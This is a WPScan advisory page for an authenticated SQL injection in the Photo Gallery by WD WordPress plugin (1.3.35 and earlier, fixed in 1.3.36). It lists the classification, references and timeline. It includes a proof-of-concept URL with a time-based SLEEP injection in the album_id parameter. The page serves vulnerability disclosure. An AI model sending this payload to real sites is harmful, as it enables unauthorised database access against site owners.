WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Photo Gallery by WD <= 1.3.35 - Authenticated SQL Injection

Description

http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf

Proof of Concept

http://www.vulnerablesite.com/wp-admin/admin-ajax.php?action=addAlbumsGalleries&album_id=0%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))VvZV)&width=700&height=550&bwg_items_per_page=20&bwg_nonce=b939983df9&TB_iframe=1

Affects Plugins

photo-gallery
Fixed in version 1.3.36

References

URL
https://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Submitter

Neven Biruski

Submitter website
http://www.defensecode.com
Submitter twitter
DefenseCode
Verified

Yes

WPVDB ID
7ee790bd-84fb-4625-a308-da5d50677589

Timeline

Publicly Published

2017-05-02 (about 5 years ago)

Added

2017-05-05 (about 5 years ago)

Last Updated

2019-11-01 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin